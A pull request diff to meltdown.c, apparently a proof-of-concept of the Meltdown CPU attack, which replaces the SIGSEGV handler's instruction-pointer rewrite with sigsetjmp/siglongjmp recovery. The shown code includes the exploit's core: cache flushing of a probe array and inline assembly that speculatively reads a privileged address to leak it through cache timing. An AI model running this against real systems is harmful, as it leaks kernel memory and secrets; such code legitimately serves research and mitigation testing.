### PR TITLE
Slightly simplify SIGSEGV recovery

### DIFF
--- a/meltdown.c
+++ b/meltdown.c
@@ -7,6 +7,7 @@
 #include <unistd.h>
 #include <fcntl.h>
 #include <ctype.h>
+#include <setjmp.h>
 
 #include <x86intrin.h>
 
@@ -27,6 +28,8 @@
 #define BITS_READ	8
 #define VARIANTS_READ	(1 << BITS_READ)
 
+static jmp_buf jbuf;
+
 static char target_array[VARIANTS_READ * TARGET_SIZE];
 
 void clflush_target(void)
@@ -37,11 +40,12 @@ void clflush_target(void)
 		_mm_clflush(&target_array[i * TARGET_SIZE]);
 }
 
-extern char stopspeculate[];
-
 static void __attribute__((noinline))
 speculate(unsigned long addr)
 {
+	if( sigsetjmp(jbuf, 1) ){
+		return;
+	}
 #ifdef __x86_64__
 	asm volatile (
 		"lea %[target], %%rbx\n\t"
@@ -54,9 +58,6 @@ speculate(unsigned long addr)
 		"movzx (%[addr]), %%eax\n\t"
 		"shl $12, %%rax\n\t"
 		"movzx (%%rbx, %%rax, 1), %%rbx\n"
-
-		"stopspeculate: \n\t"
-		"nop\n\t"
 		:
 		: [target] "m" (target_array),
 		  [addr] "r" (addr)
@@ -75,9 +76,6 @@ speculate(unsigned long addr)
 		"shl $12, %%eax\n\t"
 		"movzx (%%ebx, %%eax, 1), %%ebx\n"
 
-
-		"stopspeculate: \n\t"
-		"nop\n\t"
 		:
 		: [target] "m" (target_array),
 		  [addr] "r" (addr)
@@ -126,13 +124,7 @@ void check(void)
 
 void sigsegv(int sig, siginfo_t *siginfo, void *context)
 {
-	ucontext_t *ucontext = context;
-
-#ifdef __x86_64__
-	ucontext->uc_mcontext.gregs[REG_RIP] = (unsigned long)stopspeculate;
-#else
-	ucontext->uc_mcontext.gregs[REG_EIP] = (unsigned long)stopspeculate;
-#endif
+	siglongjmp(jbuf, 1);
 	return;
 }
 


### PR DESCRIPTION
Use long jumps to recover from the signal
Signed-off-by: Artem Polyakov <artpol84@gmail.com>